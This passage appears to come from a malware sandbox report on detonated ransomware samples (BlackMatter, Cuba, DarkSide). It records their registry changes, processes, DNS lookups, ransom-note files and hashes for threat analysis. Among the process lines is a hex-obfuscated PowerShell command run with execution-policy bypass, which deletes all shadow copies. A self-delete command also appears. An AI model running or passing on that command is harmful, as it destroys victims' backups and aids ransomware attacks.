| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
Files
memory/2576-0-0x0000000000200000-0x0000000000240000-memory.dmp
C:\XS6hn5xhL.README.txt
| MD5 | f66968c47a64569e2281f65a95991be0 |
| SHA1 | ef9e3e80bfbea4c3021b226cb8cd00687013b8a8 |
| SHA256 | 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf |
| SHA512 | cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1559s
Max time network
1541s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"
C:\Windows\SysWOW64\cmd.exe
/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/2112-0-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-1-0x00000000022D0000-0x0000000002330000-memory.dmp
memory/2112-2-0x0000000000400000-0x000000000046C000-memory.dmp
C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt
| MD5 | 69acb73a5829bdddc9a7cf322178c70f |
| SHA1 | 3cd71f6cc40c90322e027712403899db2976218b |
| SHA256 | 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5 |
| SHA512 | 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e |
memory/2112-1339-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-1994-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-3958-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-4850-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2112-6830-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-9596-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-12480-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-12482-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2112-12481-0x0000000000400000-0x000000000051D000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win7-20240705-en
Max time kernel
1561s
Max time network
1567s
Command Line
Signatures
DarkSide
Renames multiple (179) files with added filename extension
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\a8e86c8e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\a8e86c8e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e\ = "a8e86c8e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\a8e86c8e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
Files
memory/2684-5-0x000007FEF665E000-0x000007FEF665F000-memory.dmp
memory/2684-6-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/2684-7-0x0000000002240000-0x0000000002248000-memory.dmp
memory/2684-8-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
memory/2684-9-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
memory/2684-10-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
memory/2684-11-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
memory/2684-12-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
memory/2684-13-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | febf5feaf0f1361b17ccb6b16e2ffa52 |
| SHA1 | a78bf2f756b27e0434d204ad58e1eb51ad1e6998 |
| SHA256 | bc0cdc708a1678f40a3ba3334aaeafdcb4b0465a760b83fb39e06eba415c7c83 |
